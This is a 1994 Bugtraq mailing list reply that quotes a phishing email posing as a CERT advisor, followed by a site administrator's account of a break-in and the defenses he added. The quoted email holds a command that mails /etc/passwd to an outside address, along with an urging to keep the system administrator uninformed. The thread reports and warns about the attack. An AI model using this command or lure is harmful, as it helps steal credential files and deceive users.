Bugtraq mailing list archives

Re: Another request for passwords

From: chowes () helix net (Charles Howes)
Date: Sun, 23 Oct 1994 04:17:40 -0700 (PDT)

On Sun, 23 Oct 1994, Douglas R. Floyd wrote:

I got this in the mail today (10-23).

Seems like someone is knocking on io.com now.

(The forward to paris is normal as mail gets forwarded there.)

BEGIN FUNKY MESSAGE --------

From vanepp () sfu ca  Sun Oct 23 00:00:56 1994
From: vanepp () sfu ca
Date: Sat, 22 Oct 1994 14:22:25
To: dfloyd () pentagon io com
Subject: Very Important

Dear user,

    It is imperative that I attain your /etc/passwd file
immediately.  It is for security reasons.  You can mail
it to me by typing:

            mail vanepp () sfu ca < /etc/passwd

Do not tell your system administrator.  I am
conducting an investigation on your system.  Thank you

Your identity will be kept confidential.  I guarantee it

Thank you for your cooperation.

Peter Van Epp      Technical Systems Operations
                   CERT Security Advisor
                   vanepp () sfu ca

END FUNKY MESSAGE -----

I send cert () cert org a copy, as well as the admins at io.com.

I know this was posted earlier, but I think this is another address,
possibly an MX record as I could not telnet or finger sfu.ca.

Hi.

Yes, someone broke into an account here at Helix, and seems to have a
grudge against one or more people.  Vanepp in particular.

Argh.  This is the third mailbomb.  I'm supposed to be in charge of
security; how do you protect against this??!?

We're using shadow passwords as of tonight, and tcp wrappers as of
last month.  The bugger keeps signing on via modem, and this is a
problem.  We can't afford callerid.

--
Charles Howes -- chowes () helix net
 Always tell the truth, then you make it the other bloke's problem!